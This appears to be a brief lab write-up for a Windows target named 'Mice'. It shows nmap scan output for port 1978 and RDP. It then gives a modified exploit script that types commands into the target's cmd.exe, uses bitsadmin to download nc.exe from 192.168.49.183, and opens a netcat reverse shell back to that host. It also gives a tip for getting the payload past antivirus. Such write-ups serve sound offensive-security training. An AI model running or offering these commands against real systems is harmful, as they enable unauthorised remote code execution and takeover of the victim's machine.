Comment on page
Mice (Windows)
1978/tcp open unisql?
| fingerprint-strings:
| DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, ms-sql-s:
|_ SIN 15win nop nop 300
1979/tcp open unisql-java?
1980/tcp open pearldoc-xact?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2022-05-18T16:19:09+00:00
|_ssl-date: 2022-05-18T16:19:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2022-05-17T00:09:34
|_Not valid after: 2022-11-16T00:09:34
7680/tcp open pando-pub?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.92%I=7%D=5/18%Time=62851BDD%P=x86_64-pc-linux-gnu%r(NU
SF:LL,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(GenericLines,15,"SIN\x2015
SF:win\x20nop\x20nop\x20300")%r(GetRequest,15,"SIN\x2015win\x20nop\x20nop\
SF:x20300")%r(HTTPOptions,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(RTSPRe
SF:quest,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(DNSVersionBindReqTCP,15
SF:,"SIN\x2015win\x20nop\x20nop\x20300")%r(Help,15,"SIN\x2015win\x20nop\x2
SF:0nop\x20300")%r(SSLSessionReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r
SF:(TLSSessionReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(FourOhFourRequ
SF:est,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(LPDString,15,"SIN\x2015wi
SF:n\x20nop\x20nop\x20300")%r(LDAPSearchReq,15,"SIN\x2015win\x20nop\x20nop
SF:\x20300")%r(LDAPBindReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(SIPOp
SF:tions,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(LANDesk-RC,15,"SIN\x201
SF:5win\x20nop\x20nop\x20300")%r(JavaRMI,15,"SIN\x2015win\x20nop\x20nop\x2
SF:0300")%r(ms-sql-s,15,"SIN\x2015win\x20nop\x20nop\x20300");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
1978 has an exploit
Modify the script
cmd1='mkdir c:\\pwn'
cmd2='bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe'
cmd3='c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443'
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("cmd.exe",ip)
sleep(1)
SendString("\n",ip)
sleep(1)
SendString(cmd1,ip)
sleep(1)
SendString("\n",ip)
sleep(1)
SendString(cmd2,ip)
sleep(1)
SendString("\n",ip)
sleep(25)
SendString(cmd3,ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS!",ip)
Now because of the antivirus setting, you need to host the file on an actual web server (apache) instead of the python web server or it won't work.
Last modified 1yr ago